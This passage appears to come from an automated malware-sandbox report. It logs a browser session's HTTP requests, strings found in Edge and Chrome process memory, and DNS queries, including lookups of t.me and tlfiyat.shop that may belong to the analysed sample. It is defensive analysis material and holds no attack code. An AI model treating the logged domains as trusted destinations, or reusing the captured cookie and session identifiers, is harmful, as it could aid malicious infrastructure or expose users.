same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=9C59E040D55647EB95FDFAA0B26610FB.RefC=2025-01-22T21:23:03Z; USRLOC=; MUID=007544F7BD83612410BC518BBC9A60DE; MUIDB=007544F7BD83612410BC518BBC9A60DE; _EDGE_S=F=1&SID=32170533DBA46DBD3EFF104FDA026CEA; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.c7d27109b98aa5c6a189.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.4sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=9C59E040D55647EB95FDFAA0B26610FB.RefC=2025-01-22T21:23:03Z; USRLOC=; MUID=007544F7BD83612410BC518BBC9A60DE; MUIDB=007544F7BD83612410BC518BBC9A60DE; _EDGE_S=F=1&SID=32170533DBA46DBD3EFF104FDA026CEA; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.fd6d811d83dd3b0c7b4f.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.ed394b73f8f3e2ec5379.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.7fc3109769390e0f7912.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.3e42f97db270237ebd3c.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /crx/blobs/AcmIXbpGoRruM6Rg2pdHIUfNGnvAwJcqpFoWJV4Xd6PeYFnv5YpJ0-GVzjWL6XpCDzrg9cVo2bTwfPVau85UdyeFfZQe-rOdS7oyguq-391NmfeQd9WZZkjpgIbL1I5KKEcAxlKa5Z8JDrufy52udyO9TokqhOw4Sbnj/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: chrome.exe, 00000005.00000002.2634931064.000077B0004B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: msedge.exe, 00000009.00000003.2695418792.000041B002A50000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695149817.000041B00296C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694885968.000041B0006FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 'nonce-y2jRaAaOadACagsVStDvbcK13rIh7DoFKDWkTdKYXZY=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2636045339.000077B000698000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: /www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2634931064.000077B0004B5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2636045339.000077B000698000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: msedge.exe, 00000009.00000003.2682722341.000041B00038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: allpdf.com"},{"applied_policy":"ChromeUA","domain":"pcsx2.net"},{"applied_policy":"ChromeUA","domain":"mynova.villanova.edu"},{"applied_policy":"ChromeUA","domain":"nodejs.org"},{"applied_policy":"ChromeUA","domain":"accessbcc.bristolcc.edu"},{"applied_policy":"ChromeUA","domain":"web.goodnotes.com"},{"applied_policy":"ChromeUA","domain":"central.bitdefender.com"},{"applied_policy":"ChromeUA","domain":"login.bitdefender.com"},{"applied_policy":"ChromeUA","domain":"joinhoney.com"},{"applied_policy":"ChromeUA","domain":"rolimons.com"},{"applied_policy":"ChromeUA","domain":"panorama.charter.com"},{"applied_policy":"ChromeUA","domain":"olakoudos.xyz"},{"applied_policy":"ChromeUA","domain":"go.csn.edu"},{"applied_policy":"ChromeUA","domain":"api-cde355e8.duosecurity.com"},{"applied_policy":"ChromeUA","domain":"smjuhsd.instructure.com"},{"applied_policy":"ChromeUA","domain":"blox.link"},{"applied_policy":"ChromeUA","domain":"api-3d4a13e1.duosecurity.com"},{"applied_policy":"ChromeUA","domain":"calbaptist.blackboard.com"},{"applied_policy":"ChromeUA","domain":"agriedu.net"},{"applied_policy":"ChromeUA","domain":"help.hulu.com","path_match":["/s/article/allowing-adblock-and-adblock-plus"]}],"policies":[{"name":"EdgeUA","type":"partialReplacement","value":"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.17763"},{"name":"IEUA","type":"platformIgnorantFullReplacement","value":"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Zoom 3.6.0; rv:11.0) like Gecko"},{"name":"DrmEdgeUA","reason":"DigitalRightsManagement","type":"partialReplacement","value":"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763"},{"name":"EdgUA","type":"replaceIfWorkaroundsNeeded"},{"name":"DrmEdgUA","reason":"DigitalRightsManagement","type":"replaceIfWorkaroundsNeeded"},{"name":"ChromeUA","type":"edgeTokenReplacement"},{"name":"DoNotOverride","type":"doNotOverride"},{"name":"Edge99","type":"partialReplacement","value":"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Edg/99.0.1150.55"},{"name":"Chrome99","type":"partialReplacement","value":"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36"},{"name":"ChromeUAAndClientHints","type":"edgeTokenReplacementAndClientHints","value":{"sec-ch-ua-add":[{"brand":"Google Chrome"}],"sec-ch-ua-remove":["Microsoft Edge"],"user_agent_override":""}}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"Prompt","domain":"www.reddit.com"},{"applied_policy":"Prompt","domain":"www.telegraphindia.com"},{"applied_policy":"Prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"Prompt","domain":"pushengage.com"},{"applied_policy":"Prompt","domain":"www.timesnownews.com"},{"applied_policy":"Prompt","domain":"www.couponrani.com"},{"applied_policy":"Prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"Prompt","domain":"www.as
Source: chrome.exe, 00000005.00000003.2555806618.000077B00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2555384579.000077B000F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2555485922.000077B000F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000005.00000003.2555806618.000077B00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2555384579.000077B000F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2555485922.000077B000F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000005.00000002.2636045339.000077B000698000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ht/www.youtube.com/J equals www.youtube.com (Youtube)
Source: msedge.exe, 00000009.00000003.2695418792.000041B002A50000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694769164.000041B000670000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695149817.000041B00296C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com equals www.facebook.com (Facebook)
Source: msedge.exe, 00000009.00000003.2695418792.000041B002A50000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694769164.000041B000670000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695149817.000041B00296C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com equals www.youtube.com (Youtube)
Source: msedge.exe, 00000009.00000003.2695418792.000041B002A50000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694769164.000041B000670000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695149817.000041B00296C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.comh`https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:8 equals www.facebook.com (Facebook)
Source: msedge.exe, 00000009.00000003.2695418792.000041B002A50000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694769164.000041B000670000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695149817.000041B00296C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.comh`https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:8 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638627741.000077B000B9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2638923981.000077B000C64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/* equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2634931064.000077B0004B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000003.2575098266.000077B00130C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638682130.000077B000BEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2638885388.000077B000C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2638885388.000077B000C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca` equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2641965877.000077B0010D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytcaogl = equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2634931064.000077B0004B5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2635728849.000077B00061C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2639675930.000077B000D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2642394292.000077B001134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2644554942.000077B001C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2644554942.000077B001C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlP equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2639675930.000077B000D74000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000002.2644554942.000077B001C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlnjb equals www.youtube.com (Youtube)
Source: msedge.exe, 00000009.00000003.2682722341.000041B00038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: libraryBlobsAreReusedByMonolithicPipelines && !isQualcommProprietary && !(IsLinux() && isIntel) && !(IsChromeOS() && isSwiftShader)allpdf.com"},{"applied_policy":"ChromeUA","domain":"pcsx2.net"},{"applied_policy":"ChromeUA","domain":"mynova.villanova.edu"},{"applied_policy":"ChromeUA","domain":"nodejs.org"},{"applied_policy":"ChromeUA","domain":"accessbcc.bristolcc.edu"},{"applied_policy":"ChromeUA","domain":"web.goodnotes.com"},{"applied_policy":"ChromeUA","domain":"central.bitdefender.com"},{"applied_policy":"ChromeUA","domain":"login.bitdefender.com"},{"applied_policy":"ChromeUA","domain":"joinhoney.com"},{"applied_policy":"ChromeUA","domain":"rolimons.com"},{"applied_policy":"ChromeUA","domain":"panorama.charter.com"},{"applied_policy":"ChromeUA","domain":"olakoudos.xyz"},{"applied_policy":"ChromeUA","domain":"go.csn.edu"},{"applied_policy":"ChromeUA","domain":"api-cde355e8.duosecurity.com"},{"applied_policy":"ChromeUA","domain":"smjuhsd.instructure.com"},{"applied_policy":"ChromeUA","domain":"blox.link"},{"applied_policy":"ChromeUA","domain":"api-3d4a13e1.duosecurity.com"},{"applied_policy":"ChromeUA","domain":"calbaptist.blackboard.com"},{"applied_policy":"ChromeUA","domain":"agriedu.net"},{"applied_policy":"ChromeUA","domain":"help.hulu.com","path_match":["/s/article/allowing-adblock-and-adblock-plus"]}],"policies":[{"name":"EdgeUA","type":"partialReplacement","value":"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.17763"},{"name":"IEUA","type":"platformIgnorantFullReplacement","value":"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Zoom 3.6.0; rv:11.0) like Gecko"},{"name":"DrmEdgeUA","reason":"DigitalRightsManagement","type":"partialReplacement","value":"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763"},{"name":"EdgUA","type":"replaceIfWorkaroundsNeeded"},{"name":"DrmEdgUA","reason":"DigitalRightsManagement","type":"replaceIfWorkaroundsNeeded"},{"name":"ChromeUA","type":"edgeTokenReplacement"},{"name":"DoNotOverride","type":"doNotOverride"},{"name":"Edge99","type":"partialReplacement","value":"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Edg/99.0.1150.55"},{"name":"Chrome99","type":"partialReplacement","value":"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36"},{"name":"ChromeUAAndClientHints","type":"edgeTokenReplacementAndClientHints","value":{"sec-ch-ua-add":[{"brand":"Google Chrome"}],"sec-ch-ua-remove":["Microsoft Edge"],"user_agent_override":""}}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"Prompt","domain":"www.reddit.com"},{"applied_policy":"Prompt","domain":"www.telegraphindia.com"},{"applied_policy":"Prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"Prompt","domain":"pushengage.com"},{"applied_policy":"Prompt","domain":"www.timesnownews.com"},{"applied_policy":"Prompt","do
Source: msedge.exe, 00000009.00000003.2695418792.000041B002A50000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695149817.000041B00296C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694885968.000041B0006FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: script-src 'nonce-y2jRaAaOadACagsVStDvbcK13rIh7DoFKDWkTdKYXZY=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob: equals www.youtube.com (Youtube)
Source: msedge.exe, 00000009.00000003.2695418792.000041B002A50000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694769164.000041B000670000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695149817.000041B00296C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: chrome.exe, 00000005.00000002.2638627741.000077B000B9C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2695418792.000041B002A50000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2694769164.000041B000670000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: t.me
Source: global traffic DNS traffic detected: DNS query: tlfiyat.shop
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: global traffic DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic DNS traffic detected: DNS query: assets.msn.com
Source: global traffic DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic DNS traffic detected: DNS query: c.msn.com
Source: global traffic DNS traffic detected: DNS query: api.msn.com
